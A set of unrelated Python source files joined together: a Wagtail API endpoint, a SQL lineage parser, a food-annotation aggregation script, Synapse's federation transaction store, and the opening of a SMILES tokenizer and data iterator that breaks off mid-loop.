class SimulationExamplesAPIEndpoint(BaseAPIEndpoint):
    """Read-only API endpoint exposing SimulationExample objects.

    Behaves like a standard wagtail BaseAPIEndpoint, but renders
    camelCased JSON and customises serializer construction so nested
    child serializers are built per related field.
    """

    renderer_classes = [CamelCaseJSONRenderer, BrowsableAPIRenderer]
    base_serializer_class = SimulationExampleSerializer
    filter_backends = [
        FieldsFilter,
        OrderingFilter,
        SearchFilter
    ]
    known_query_parameters = BaseAPIEndpoint.known_query_parameters.union([
    ])
    body_fields = [
        'id',
    ]
    meta_fields = [
    ]
    listing_default_fields = BaseAPIEndpoint.listing_default_fields + [
        'id',
        'name',
    ]
    nested_default_fields = BaseAPIEndpoint.nested_default_fields + [
        'id',
        'name',
    ]
    # Fields only returned in the detail view, never in listings.
    detail_only_fields = [
        'code',
        'language',
        'universe',
    ]
    name = 'simulationexamples'
    model = SimulationExample

    def get_queryset(self):
        """Return the queryset of all SimulationExample objects."""
        # The original indirection through a `models = None` list always
        # resolved to SimulationExample, so query it directly.
        return SimulationExample.objects.all()

    def get_object(self):
        """Return the object for the current detail request."""
        return super(SimulationExamplesAPIEndpoint, self).get_object()

    def check_query_parameters(self, queryset):
        """
        Ensure that only valid query parameters are included in the URL.

        Raises:
            BadRequestError: if an unknown query parameter is present.
        """
        query_parameters = set(self.request.GET.keys())
        # All query parameters must be either a database field or an operation
        allowed_query_parameters = set(self.get_available_fields(queryset.model, db_fields_only=True)).union(self.known_query_parameters)
        unknown_parameters = query_parameters - allowed_query_parameters
        if unknown_parameters:
            raise BadRequestError("query parameter is not an operation or a recognised field: %s" % ', '.join(sorted(unknown_parameters)))

    @classmethod
    def _get_serializer_class(cls, router, model, fields_config, show_details=False, nested=False):
        """Build a serializer class for ``model`` honouring ``fields_config``.

        ``fields_config`` is a list of (field_name, negated, sub_fields)
        tuples; a leading '*' selects all fields and a leading '_' selects
        none as the starting set.

        Raises:
            BadRequestError: for unknown fields or sub-fields given on a
                non-related field.
        """
        from collections import OrderedDict

        from django.core.exceptions import FieldDoesNotExist
        from modelcluster.fields import ParentalKey
        from wagtail.api.v2.serializers import get_serializer_class

        # Get all available fields
        body_fields = cls.get_body_fields_names(model)
        meta_fields = cls.get_meta_fields_names(model)
        all_fields = body_fields + meta_fields
        # Remove any duplicates while preserving order
        all_fields = list(OrderedDict.fromkeys(all_fields))
        if not show_details:
            # Remove detail only fields.  BUG FIX: `all_fields` is a list,
            # so a missing entry raises ValueError; the original caught
            # KeyError, which list.remove never raises, and crashed instead.
            for field in cls.detail_only_fields:
                try:
                    all_fields.remove(field)
                except ValueError:
                    pass
        # Get list of configured fields
        if show_details:
            fields = set(cls.get_detail_default_fields(model))
        elif nested:
            fields = set(cls.get_nested_default_fields(model))
        else:
            fields = set(cls.get_listing_default_fields(model))
        # If first field is '*' start with all fields
        # If first field is '_' start with no fields
        if fields_config and fields_config[0][0] == '*':
            fields = set(all_fields)
            fields_config = fields_config[1:]
        elif fields_config and fields_config[0][0] == '_':
            fields = set()
            fields_config = fields_config[1:]
        mentioned_fields = set()
        sub_fields = {}
        for field_name, negated, field_sub_fields in fields_config:
            if negated:
                try:
                    fields.remove(field_name)
                except KeyError:
                    pass
            else:
                fields.add(field_name)
                if field_sub_fields:
                    sub_fields[field_name] = field_sub_fields
            mentioned_fields.add(field_name)
        unknown_fields = mentioned_fields - set(all_fields)
        if unknown_fields:
            raise BadRequestError("unknown fields: %s" % ', '.join(sorted(unknown_fields)))
        # Build nested serialisers
        child_serializer_classes = {}
        for field_name in fields:
            try:
                django_field = model._meta.get_field(field_name)
            except FieldDoesNotExist:
                django_field = None
            if django_field and django_field.is_relation:
                child_sub_fields = sub_fields.get(field_name, [])
                # Inline (aka "child") models should display all fields by default
                if isinstance(getattr(django_field, 'field', None), ParentalKey):
                    if not child_sub_fields or child_sub_fields[0][0] not in ['*', '_']:
                        child_sub_fields = list(child_sub_fields)
                        child_sub_fields.insert(0, ('*', False, None))
                # Get a serializer class for the related object
                child_model = django_field.related_model
                child_endpoint_class = router.get_model_endpoint(child_model)
                child_endpoint_class = child_endpoint_class[1] if child_endpoint_class else BaseAPIEndpoint
                child_serializer_classes[field_name] = child_endpoint_class._get_serializer_class(router, child_model, child_sub_fields, nested=True)
            else:
                if field_name in sub_fields:
                    # Sub fields were given for a non-related field
                    raise BadRequestError("'%s' does not support nested fields" % field_name)
        # Reorder fields so it matches the order of all_fields
        fields = [field for field in all_fields if field in fields]
        field_serializer_overrides = {field[0]: field[1] for field in cls.get_field_serializer_overrides(model).items() if field[0] in fields}
        return get_serializer_class(
            model,
            fields,
            meta_fields=meta_fields,
            field_serializer_overrides=field_serializer_overrides,
            child_serializer_classes=child_serializer_classes,
            base=cls.base_serializer_class
        )
|
import json
import logging
from typing import Any, Dict, List, Optional, Set, Tuple, Type
from dbcat.catalog import Catalog, CatColumn, CatSource, CatTable
from pglast import Node
from pglast.ast import IntoClause
from pglast.visitors import Ancestor, Continue, Skip, Visitor
from data_lineage import ColumnNotFound, SemanticError, TableNotFound
from data_lineage.parser.binder import (
CatTableEncoder,
ColumnContext,
SelectBinder,
WithContext,
)
from data_lineage.parser.visitor import (
ColumnRefVisitor,
ExprVisitor,
RangeVarVisitor,
TableVisitor,
)
class DmlVisitor(Visitor):
    """Base pglast visitor that extracts lineage from a DML statement.

    Walks the parse tree to collect the target (insert) table/columns and
    the source (select) tables/columns, then binds them against a dbcat
    catalog so column-level lineage can be derived.
    """

    def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor]):
        # Human-readable name of the statement/job being analysed.
        self._name = name
        # Raw RangeVar parse node of the table being written to.
        self._insert_table: Optional[Node] = None
        # Column names explicitly listed in the INSERT target list.
        self._insert_columns: List[str] = []
        # Catalog objects resolved by bind().
        self._target_table: Optional[CatTable] = None
        self._target_columns: List[CatColumn] = []
        self._source_tables: Set[CatTable] = set()
        self._source_columns: List[ColumnContext] = []
        # Parse nodes / expression visitors gathered from the SELECT part.
        self._select_tables: List[Node] = []
        self._select_columns: List[ExprVisitor] = []
        # WITH (CTE) aliases: alias -> {"tables": [...], "columns": [...]}.
        self._with_aliases: Dict[str, Dict[str, Any]] = {}
        # Bound CTE contexts keyed by alias, filled by _bind_with().
        self._alias_map: Dict[str, WithContext] = {}
        # Generates unique aliases (_U0, _U1, ...) for anonymous columns.
        self._column_alias_generator = ("_U{}".format(i) for i in range(0, 1000))
        self.expr_visitor_clazz = expr_visitor_clazz

    @property
    def name(self) -> str:
        """Name of the statement/job this visitor analyses."""
        return self._name

    @property
    def insert_table(self) -> Optional[Node]:
        """Raw parse node of the write target (None until visited)."""
        return self._insert_table

    @property
    def target_table(self) -> Optional[CatTable]:
        # NOTE(review): annotation widened to Optional; this is None until
        # bind() succeeds.
        return self._target_table

    @property
    def target_columns(self) -> List[CatColumn]:
        """Catalog columns of the write target, filled by bind()."""
        return self._target_columns

    @property
    def source_tables(self) -> Set[CatTable]:
        """Catalog tables read by the statement, filled by bind()."""
        return self._source_tables

    @property
    def source_columns(self) -> List[ColumnContext]:
        """Bound source columns, filled by bind()."""
        return self._source_columns

    @property
    def select_tables(self) -> List[Node]:
        """Raw parse nodes of the tables in the SELECT part."""
        return self._select_tables

    @property
    def select_columns(self) -> List[ExprVisitor]:
        """Expression visitors for the columns in the SELECT part."""
        return self._select_columns

    def visit_RangeVar(self, ancestors, node):
        # The first RangeVar encountered is the DML target table.
        self._insert_table = node
        return Skip

    def visit_ResTarget(self, ancestors, node):
        # Explicit column list of the INSERT target.
        self._insert_columns.append(node.name)
        return Skip

    def visit_CommonTableExpr(self, ancestors, node):
        # Record each WITH alias together with the tables/columns its
        # subquery reads; bound later in _bind_with().
        with_alias = node.ctename
        table_visitor = TableVisitor(self.expr_visitor_clazz)
        table_visitor(node.ctequery)
        self._with_aliases[with_alias] = {
            "tables": table_visitor.sources,
            "columns": table_visitor.columns,
        }
        return Skip

    def visit_CreateTableAsStmt(self, ancestors, node):
        """
        Do not process CTAS statement by default.
        :param ancestors:
        :type ancestors:
        :param node:
        :type node:
        :return:
        :rtype:
        """
        return Skip

    def bind(self, catalog: Catalog, source: CatSource):
        """Resolve collected parse nodes against the catalog.

        Binds target table/columns, WITH aliases and the SELECT part, then
        validates that target and source column counts match.

        Raises:
            SemanticError: when no sources/targets are found or the column
                counts do not line up.
        """
        self._bind_target(catalog, source)
        self._bind_with(catalog, source)
        binder = SelectBinder(
            catalog,
            source,
            self._select_tables,
            self._select_columns,
            self._column_alias_generator,
            self.expr_visitor_clazz,
            self._alias_map,
        )
        binder.bind()
        if len(binder.tables) == 0:
            raise SemanticError("No source tables found")
        if len(binder.columns) == 0:
            raise SemanticError("No source columns found")
        if self.target_table is None:
            raise SemanticError("No target table found")
        if len(self.target_columns) == 0:
            raise SemanticError(
                "No target columns found in {}".format(
                    json.dumps(self.target_table, cls=CatTableEncoder)
                )
            )
        if len(self.target_columns) != len(binder.columns):
            raise SemanticError(
                "No. of target columns({}) does not match no. of source columns({})".format(
                    len(self.target_columns), len(binder.columns)
                )
            )
        self._source_tables = binder.tables
        self._source_columns = binder.columns

    def _bind_target(self, catalog: Catalog, source: CatSource):
        """Look up the target table and its columns in the catalog.

        Raises:
            TableNotFound: if the target table does not exist.
            ColumnNotFound: if an explicitly listed INSERT column is
                missing from the target table.
        """
        target_table_visitor = RangeVarVisitor()
        target_table_visitor(self._insert_table)
        logging.debug("Searching for: {}".format(target_table_visitor.search_string))
        try:
            self._target_table = catalog.search_table(
                source_like=source.name, **target_table_visitor.search_string
            )
        except RuntimeError as error:
            logging.debug(str(error))
            raise TableNotFound(
                '"{schema_like}"."{table_like}" is not found'.format(
                    **target_table_visitor.search_string
                )
            )
        logging.debug("Bound target table: {}".format(self._target_table))
        if len(self._insert_columns) == 0:
            # No explicit column list: the statement writes every column.
            self._target_columns = catalog.get_columns_for_table(self._target_table)
            logging.debug("Bound all columns in {}".format(self._target_table))
        else:
            bound_cols = catalog.get_columns_for_table(
                self._target_table, column_names=self._insert_columns
            )
            # Handle error case
            if len(bound_cols) != len(self._insert_columns):
                for column in self._insert_columns:
                    found = False
                    for bound in bound_cols:
                        if column == bound.name:
                            found = True
                            break
                    if not found:
                        raise ColumnNotFound(
                            '"{}" not found in the following tables: {}'.format(
                                column,
                                json.dumps([self._target_table], cls=CatTableEncoder),
                            )
                        )
            self._target_columns = bound_cols
            logging.debug("Bound {} target columns".format(len(bound_cols)))

    def _bind_with(self, catalog: Catalog, source: CatSource):
        """Bind every WITH (CTE) alias and store its context in _alias_map."""
        if self._with_aliases:
            # Bind all the WITH expressions
            for key in self._with_aliases.keys():
                binder = SelectBinder(
                    catalog,
                    source,
                    self._with_aliases[key]["tables"],
                    self._with_aliases[key]["columns"],
                    self._column_alias_generator,
                    self.expr_visitor_clazz,
                )
                binder.bind()
                self._alias_map[key] = WithContext(
                    catalog=catalog,
                    alias=key,
                    tables=binder.tables,
                    columns=binder.columns,
                )

    def resolve(
        self,
    ) -> Tuple[
        Tuple[Optional[str], str],
        List[Tuple[Optional[str], str]],
        List[Tuple[Optional[str], str]],
    ]:
        """Resolve parse nodes to (schema, name) pairs without a catalog.

        Returns:
            A tuple of (target table fqdn, source table fqdns, source
            column names).
        """
        target_table_visitor = RangeVarVisitor()
        target_table_visitor(self._insert_table)
        bound_tables = []
        for table in self._select_tables:
            visitor = RangeVarVisitor()
            visitor(table)
            bound_tables.append(visitor.fqdn)
        bound_cols = []
        for expr_visitor in self._select_columns:
            for column in expr_visitor.columns:
                column_ref_visitor = ColumnRefVisitor()
                column_ref_visitor(column)
                bound_cols.append(column_ref_visitor.name[0])
        return target_table_visitor.fqdn, bound_tables, bound_cols
class SelectSourceVisitor(DmlVisitor):
    """DmlVisitor that pulls sources from a plain SELECT statement."""

    def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor] = ExprVisitor):
        super(SelectSourceVisitor, self).__init__(name, expr_visitor_clazz)

    def visit_SelectStmt(self, ancestors, node):
        # Delegate table/column discovery to a TableVisitor and copy its
        # findings (including WITH aliases) into this visitor's state.
        source_visitor = TableVisitor(self.expr_visitor_clazz)
        source_visitor(node)
        self._select_tables = source_visitor.sources
        self._select_columns = source_visitor.columns
        self._with_aliases.update(source_visitor.with_aliases)
        return Skip
class SelectIntoVisitor(DmlVisitor):
    """DmlVisitor for SELECT ... INTO statements."""

    def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor] = ExprVisitor):
        super(SelectIntoVisitor, self).__init__(name, expr_visitor_clazz)

    def visit_SelectStmt(self, ancestors, node):
        # The INTO clause names the target; let the base class record it.
        super().__call__(node.intoClause)
        source_visitor = TableVisitor(self.expr_visitor_clazz)
        source_visitor(node.targetList)
        source_visitor(node.fromClause)
        self._select_tables = source_visitor.sources
        self._select_columns = source_visitor.columns
        self._with_aliases.update(source_visitor.with_aliases)
        return Skip
class CTASVisitor(SelectSourceVisitor):
    """SelectSourceVisitor for CREATE TABLE AS (CTAS) statements.

    Unlike plain DML, the target table does not exist yet, so
    ``_bind_target`` creates the table and its columns in the catalog.
    """

    def __init__(self, name: str, expr_visitor_clazz: Type[ExprVisitor] = ExprVisitor):
        super(CTASVisitor, self).__init__(name, expr_visitor_clazz)

    def visit_CreateTableAsStmt(self, ancestors, node):
        # CTAS is this visitor's whole purpose, so descend into it
        # (the base class skips it).
        return Continue

    def visit_String(self, ancestors: Ancestor, node):
        """Collect column names that appear inside the INTO clause."""
        # Walk up the ancestor chain to check whether this string literal
        # belongs to an IntoClause (i.e. it is a target column name).
        parent = ancestors
        in_into_clause = False
        while parent is not None and not in_into_clause:
            in_into_clause = isinstance(parent.node, IntoClause)
            parent = parent.parent
        if in_into_clause:
            self._insert_columns.append(node.val)

    def _bind_target(self, catalog: Catalog, source: CatSource):
        """Create the CTAS target table (and its columns) in the catalog.

        Raises:
            SemanticError: if the table name is unqualified and the source
                has no default schema.
        """
        target_table_visitor = RangeVarVisitor()
        target_table_visitor(self._insert_table)
        if target_table_visitor.is_qualified:
            schema = catalog.get_schema(
                source_name=source.name, schema_name=target_table_visitor.schema_name
            )
        elif source.default_schema is not None:
            schema = source.default_schema.schema
        else:
            raise SemanticError(
                "No default schema set for source {}".format(source.fqdn)
            )
        self._target_table = catalog.add_table(
            table_name=target_table_visitor.name, schema=schema
        )
        # BUG FIX: sort_order was previously initialised to 1 and never
        # incremented, so every created column got sort_order=1.  Use
        # enumerate to assign increasing positions starting at 1.
        for sort_order, col in enumerate(self._insert_columns, start=1):
            self._target_columns.append(
                catalog.add_column(
                    column_name=col,
                    data_type="varchar",
                    sort_order=sort_order,
                    table=self._target_table,
                )
            )
|
import os
import pandas as pd
def parse_annotations_with_concentration_template(annotations, premise):
    """Parse annotations with the concentration template.

    Aggregates the numbered hypothesis columns (``hypothesis_1`` ...
    ``hypothesis_50``) of all rows sharing *premise* into majority-vote
    NER decisions.

    Args:
        annotations (pd.DataFrame): Annotations.
        premise (str): Premise.

    Returns:
        annotations_aggregated: List of parsed annotations.
        annotations_reported: List of non consensus annotations.
    """
    annotations_aggregated = []
    annotations_reported = []
    rows_grouped_by_premises = annotations[annotations["premise"] == premise]
    # Robustness: no rows for this premise -> nothing to aggregate.
    if rows_grouped_by_premises.empty:
        return annotations_aggregated, annotations_reported
    # All hypothesis_* metadata is identical within the group; read it once.
    first_row = rows_grouped_by_premises.iloc[0]
    for i in range(1, 51):
        # BUG FIX: the original only guarded the correct_ner_{i} lookup, so
        # a missing hypothesis_{i} column crashed with an uncaught KeyError.
        # Stop cleanly as soon as either numbered column is absent.
        try:
            hypothesis = first_row[f"hypothesis_{i}"]
            ners = rows_grouped_by_premises[f"correct_ner_{i}"]
        except KeyError:
            break
        # Skip empty slots.  Real NaN cells are treated the same as the
        # literal strings "nan"/"null" that appear in exported CSVs.
        if pd.isna(hypothesis) or hypothesis == "nan" or hypothesis == "null":
            continue
        n_entail = len(ners[ners == "Entails"])
        # contrast to Not Entails/Error in other templates.
        n_non_entail = len(ners[ners == "Not Entails"])
        if n_entail > 0 or n_non_entail > 0:
            # Report to the annotator if annotation results are highly
            # non consensus.
            if n_entail == n_non_entail:
                annotations_reported.append(
                    [
                        first_row["id"],
                        premise,
                        hypothesis,
                    ]
                )
                continue
            correct_ner = (
                "Entails" if n_entail > n_non_entail else "Not Entails"
            )
            annotations_aggregated.append(
                [
                    first_row["id"],
                    premise,
                    hypothesis.replace("(whole plant)", ""),
                    correct_ner,
                    n_entail,
                    n_non_entail,
                    first_row[f"hypothesis_food_{i}"],
                    first_row[f"hypothesis_food_id_{i}"],
                    first_row[f"hypothesis_food_part_{i}"],
                    None,  # Food part id is not collected currently.
                    first_row[f"hypothesis_chemical_{i}"],
                    first_row[f"hypothesis_chemical_id_{i}"],
                    first_row[f"hypothesis_conc_value_{i}"],
                    first_row[f"hypothesis_conc_value_id_{i}"],
                    first_row[f"hypothesis_conc_unit_{i}"],
                    first_row[f"hypothesis_conc_unit_id_{i}"],
                ]
            )
    return annotations_aggregated, annotations_reported
def parse_annotations_with_food_part_template(annotations, premise):
    """Parse annotations with the food / food-part template.

    Groups the rows sharing *premise* by hypothesis and majority-votes the
    ``correct_ner`` annotations ("Entails" vs "Not Entails/Error").

    Args:
        annotations (pd.DataFrame): Annotations.
        premise (str): Premise.

    Returns:
        annotations_aggregated: List of parsed annotations.
        annotations_reported: List of non consensus annotations.
    """
    annotations_aggregated = []
    annotations_reported = []
    rows_grouped_by_premises = annotations[annotations["premise"] == premise]
    for hypothesis in rows_grouped_by_premises["hypothesis"].unique():
        rows_grouped_by_hypotheses = rows_grouped_by_premises[
            rows_grouped_by_premises["hypothesis"] == hypothesis
        ]
        # Fixed a pointless f-string (no placeholders) in this lookup.
        ners = rows_grouped_by_hypotheses["correct_ner"]
        n_entail = len(ners[ners == "Entails"])
        n_non_entail = len(ners[ners == "Not Entails/Error"])
        # Report to the annotator if annotation results are highly
        # non consensus.
        if n_entail == n_non_entail:
            annotations_reported.append(
                [rows_grouped_by_hypotheses.iloc[0]["id"], premise, hypothesis]
            )
            continue
        correct_ner = "Entails" if n_entail > n_non_entail else "Not Entails"
        # Strip a leading sentence marker "<s>" from the premise, if present.
        raw_premise = rows_grouped_by_hypotheses["premise"].values[0]
        if raw_premise[:3] == "<s>":
            premise_filtered = raw_premise[3:]
        else:
            premise_filtered = raw_premise
        # All hypothesis_* metadata is identical within the group.
        first_row = rows_grouped_by_hypotheses.iloc[0]
        annotations_aggregated.append(
            [
                first_row["id"],
                premise_filtered,
                hypothesis.replace("(whole plant)", ""),
                correct_ner,
                n_entail,
                n_non_entail,
                first_row["hypothesis_food"],
                first_row["hypothesis_food_id"],
                first_row["hypothesis_food_part"],
                None,  # Food part id is not collected currently.
                first_row["hypothesis_chemical"],
                first_row["hypothesis_chemical_id"],
                None,  # Concentration fields do not apply to this template.
                None,
                None,
                None,
            ]
        )
    return annotations_aggregated, annotations_reported
def aggregate_annotations_with_different_templates(
    path_annotations, save_path=None, save_report=None
):
    """Aggregate annotations with different templates for annotations in the
    given folder.

    Args:
        path_annotations (str): Path to the folder with annotations.
        save_path (str or None): If not None, save the aggregated
            annotations as CSV in this path.
        save_report (str or None): If not None, save the non-consensus
            (reported) annotations as CSV in this path.

    Returns:
        pd.DataFrame: The aggregated annotations.  (The original docstring
        claimed ``None``, but the frame has always been returned.)
    """
    columns = [
        "id",
        "premise",
        "hypothesis",
        "correct_ner",
        "n_entail",
        "n_non_entail",
        "food",
        "food_id",
        "food_part",
        "food_part_id",
        "chemical",
        "chemical_id",
        "conc_value",
        "conc_value_id",
        "conc_unit",
        "conc_unit_id",
    ]
    annotations_aggregated = []
    annotations_reported = []
    for annotation_filename in os.listdir(path_annotations):
        annotations = pd.read_csv(os.path.join(path_annotations, annotation_filename))
        # Iterate over hypotheses with the same premise to avoid same
        # hypotheses generated by different premises.
        for premise in annotations["premise"].unique():
            # Concentration template is unique, and thus requiring different
            # parsing mechanism.  Concentration files end in "conc.csv".
            if annotation_filename[-8:-4] == "conc":
                parser = parse_annotations_with_concentration_template
            else:  # Include food and food parts templates.
                parser = parse_annotations_with_food_part_template
            aggregated_parsed, reported_parsed = parser(annotations, premise)
            annotations_aggregated.extend(aggregated_parsed)
            annotations_reported.extend(reported_parsed)
    # BUG FIX: pass column names at construction time; assigning
    # `.columns` afterwards raises on an empty result set.
    annotations_aggregated = pd.DataFrame(annotations_aggregated, columns=columns)
    if save_path is not None:
        annotations_aggregated.to_csv(save_path)
    if save_report is not None:
        annotations_reported = pd.DataFrame(
            annotations_reported, columns=["id", "premise", "hypothesis"]
        )
        annotations_reported.to_csv(save_report)
    return annotations_aggregated
if __name__ == "__main__":
    # Local run configuration (the original author's Windows paths).
    annotations_dir = (
        "C:\\Users\\Fang\\projects\\aifs-food_ke\\data\\annotations_20211204"
    )
    output_csv = "C:\\Users\\Fang\\projects\\aifs-food_ke\\data\\data.csv"
    report_csv = "C:\\Users\\Fang\\projects\\aifs-food_ke\\data\\reported.csv"
    aggregate_annotations_with_different_templates(
        annotations_dir, output_csv, report_csv
    )
|
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import namedtuple
import six
from canonicaljson import encode_canonical_json
from twisted.internet import defer
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.storage._base import SQLBaseStore, db_to_json
from synapse.storage.database import Database
from synapse.util.caches.expiringcache import ExpiringCache
# py2 sqlite has buffer hardcoded as only binary type, so we must use it,
# despite being deprecated and removed in favor of memoryview
# db_binary_type wraps canonical JSON blobs before they are stored.
if six.PY2:
    db_binary_type = six.moves.builtins.buffer
else:
    db_binary_type = memoryview
logger = logging.getLogger(__name__)
_TransactionRow = namedtuple(
"_TransactionRow",
("id", "transaction_id", "destination", "ts", "response_code", "response_json"),
)
_UpdateTransactionRow = namedtuple(
"_TransactionRow", ("response_code", "response_json")
)
SENTINEL = object()
class TransactionStore(SQLBaseStore):
    """A collection of queries for handling PDUs.
    """

    def __init__(self, database: Database, db_conn, hs):
        super(TransactionStore, self).__init__(database, db_conn, hs)
        # Purge month-old received transactions every 30 minutes.
        self._clock.looping_call(self._start_cleanup_transactions, 30 * 60 * 1000)
        # Short-lived cache (5 min) for per-destination retry timings.
        self._destination_retry_cache = ExpiringCache(
            cache_name="get_destination_retry_timings",
            clock=self._clock,
            expiry_ms=5 * 60 * 1000,
        )

    def get_received_txn_response(self, transaction_id, origin):
        """For an incoming transaction from a given origin, check if we have
        already responded to it. If so, return the response code and response
        body (as a dict).

        Args:
            transaction_id (str)
            origin(str)

        Returns:
            tuple: None if we have not previously responded to
            this transaction or a 2-tuple of (int, dict)
        """
        return self.db.runInteraction(
            "get_received_txn_response",
            self._get_received_txn_response,
            transaction_id,
            origin,
        )

    def _get_received_txn_response(self, txn, transaction_id, origin):
        """Transaction body for get_received_txn_response."""
        result = self.db.simple_select_one_txn(
            txn,
            table="received_transactions",
            keyvalues={"transaction_id": transaction_id, "origin": origin},
            retcols=(
                "transaction_id",
                "origin",
                "ts",
                "response_code",
                "response_json",
                "has_been_referenced",
            ),
            allow_none=True,
        )
        # A row without a response_code means we never finished responding.
        if result and result["response_code"]:
            return result["response_code"], db_to_json(result["response_json"])
        else:
            return None

    def set_received_txn_response(self, transaction_id, origin, code, response_dict):
        """Persist the response we returned for an incoming transaction, and
        should return for subsequent transactions with the same transaction_id
        and origin.

        Args:
            txn
            transaction_id (str)
            origin (str)
            code (int)
            response_json (str)
        """
        return self.db.simple_insert(
            table="received_transactions",
            values={
                "transaction_id": transaction_id,
                "origin": origin,
                "response_code": code,
                "response_json": db_binary_type(encode_canonical_json(response_dict)),
                "ts": self._clock.time_msec(),
            },
            or_ignore=True,
            desc="set_received_txn_response",
        )

    @defer.inlineCallbacks
    def get_destination_retry_timings(self, destination):
        """Gets the current retry timings (if any) for a given destination.

        Args:
            destination (str)

        Returns:
            None if not retrying
            Otherwise a dict for the retry scheme
        """
        result = self._destination_retry_cache.get(destination, SENTINEL)
        if result is not SENTINEL:
            return result
        result = yield self.db.runInteraction(
            "get_destination_retry_timings",
            self._get_destination_retry_timings,
            destination,
        )
        # We don't hugely care about race conditions between getting and
        # invalidating the cache, since we time out fairly quickly anyway.
        self._destination_retry_cache[destination] = result
        return result

    def _get_destination_retry_timings(self, txn, destination):
        """Transaction body for get_destination_retry_timings."""
        result = self.db.simple_select_one_txn(
            txn,
            table="destinations",
            keyvalues={"destination": destination},
            retcols=("destination", "failure_ts", "retry_last_ts", "retry_interval"),
            allow_none=True,
        )
        # retry_last_ts == 0 means the destination is not being retried.
        if result and result["retry_last_ts"] > 0:
            return result
        else:
            return None

    def set_destination_retry_timings(
        self, destination, failure_ts, retry_last_ts, retry_interval
    ):
        """Sets the current retry timings for a given destination.
        Both timings should be zero if retrying is no longer occurring.

        Args:
            destination (str)
            failure_ts (int|None) - when the server started failing (ms since epoch)
            retry_last_ts (int) - time of last retry attempt in unix epoch ms
            retry_interval (int) - how long until next retry in ms
        """
        self._destination_retry_cache.pop(destination, None)
        return self.db.runInteraction(
            "set_destination_retry_timings",
            self._set_destination_retry_timings,
            destination,
            failure_ts,
            retry_last_ts,
            retry_interval,
        )

    def _set_destination_retry_timings(
        self, txn, destination, failure_ts, retry_last_ts, retry_interval
    ):
        """Transaction body for set_destination_retry_timings."""
        if self.database_engine.can_native_upsert:
            # Upsert retry time interval if retry_interval is zero (i.e. we're
            # resetting it) or greater than the existing retry interval.
            sql = """
                INSERT INTO destinations (
                    destination, failure_ts, retry_last_ts, retry_interval
                )
                    VALUES (?, ?, ?, ?)
                ON CONFLICT (destination) DO UPDATE SET
                        failure_ts = EXCLUDED.failure_ts,
                        retry_last_ts = EXCLUDED.retry_last_ts,
                        retry_interval = EXCLUDED.retry_interval
                    WHERE
                        EXCLUDED.retry_interval = 0
                        OR destinations.retry_interval < EXCLUDED.retry_interval
            """
            txn.execute(sql, (destination, failure_ts, retry_last_ts, retry_interval))
            return
        # Fallback path for engines without native upsert support.
        self.database_engine.lock_table(txn, "destinations")
        # We need to be careful here as the data may have changed from under us
        # due to a worker setting the timings.
        prev_row = self.db.simple_select_one_txn(
            txn,
            table="destinations",
            keyvalues={"destination": destination},
            retcols=("failure_ts", "retry_last_ts", "retry_interval"),
            allow_none=True,
        )
        if not prev_row:
            self.db.simple_insert_txn(
                txn,
                table="destinations",
                values={
                    "destination": destination,
                    "failure_ts": failure_ts,
                    "retry_last_ts": retry_last_ts,
                    "retry_interval": retry_interval,
                },
            )
        elif retry_interval == 0 or prev_row["retry_interval"] < retry_interval:
            self.db.simple_update_one_txn(
                txn,
                "destinations",
                keyvalues={"destination": destination},
                updatevalues={
                    "failure_ts": failure_ts,
                    "retry_last_ts": retry_last_ts,
                    "retry_interval": retry_interval,
                },
            )

    def _start_cleanup_transactions(self):
        """Kick off the periodic cleanup as a tracked background process."""
        return run_as_background_process(
            "cleanup_transactions", self._cleanup_transactions
        )

    def _cleanup_transactions(self):
        """Delete received transactions older than 30 days."""
        now = self._clock.time_msec()
        month_ago = now - 30 * 24 * 60 * 60 * 1000

        def _cleanup_transactions_txn(txn):
            txn.execute("DELETE FROM received_transactions WHERE ts < ?", (month_ago,))

        return self.db.runInteraction(
            "_cleanup_transactions", _cleanup_transactions_txn
        )
|
<reponame>chaoyan1037/Re-balanced-VAE<filename>data/molecule_iterator.py<gh_stars>1-10
import os
import pickle
import re
import torchtext
from torchtext.data import Example, Field, Dataset
from torchtext.data import BucketIterator
# Regex splitting a SMILES string into chemically meaningful tokens:
# bracket atoms, two-letter halogens (Br/Cl), single-letter atoms,
# aromatic atoms, bonds, branches, ring-closure digits, etc.
pattern = "(\[[^\]]+]|Br?|Cl?|N|O|S|P|F|I|b|c|n|o|s|p|\(|\)|\.|=|#|-|\+|\\\\|\/|:|~|@|\?|>|\*|\$|\%[0-9]{2}|[0-9])"


def smi_tokenizer(smi, regex=re.compile(pattern)):
    """Tokenize a SMILES string.

    Args:
        smi: SMILES string to split.
        regex: pre-compiled token pattern (compiled once at definition
            time on purpose, so repeated calls do not recompile it).

    Returns:
        List of token strings whose concatenation equals ``smi``.

    Raises:
        AssertionError: if any character of ``smi`` is not covered by the
            token pattern (the tokens would not re-join to the input).
    """
    # findall already returns the list of captured tokens; the original
    # wrapped it in a redundant list comprehension.
    tokens = regex.findall(smi)
    assert smi == ''.join(tokens), 'smi:' + smi + '--tokens:' + ''.join(tokens)
    return tokens
class SmileBucketIterator(object):
    """Loads SMILES data and provides train/test/full BucketIterators.

    Builds (or loads) a torchtext vocabulary over tokenized SMILES strings
    and splits the examples into a training set (all but the last 5000)
    and a test set (the last 5000).
    """

    def __init__(self, data_file, vocab_file, batch_size=256):
        self.batch_size = batch_size
        # NOTE(review): eos_token and pad_token deliberately share ' '.
        smi_field = Field(sequential=True, init_token='<sos>', eos_token=' ',
                          pad_token=' ', include_lengths=True, batch_first=True, tokenize=smi_tokenizer)
        property_field = Field(sequential=False, use_vocab=False)
        # load smile data
        with open(data_file, 'r') as f:
            mol_strs = f.read().strip().split('\n')
        mol_strs = [mol.replace(' ', '') for mol in mol_strs]
        mol_strs = [smi_field.preprocess(mol) for mol in mol_strs]
        smi_examples = []
        fields = [('smile', smi_field), ('property', property_field)]
        for mol in mol_strs:
            # Placeholder property values; only the SMILES field is used
            # for vocab building here.
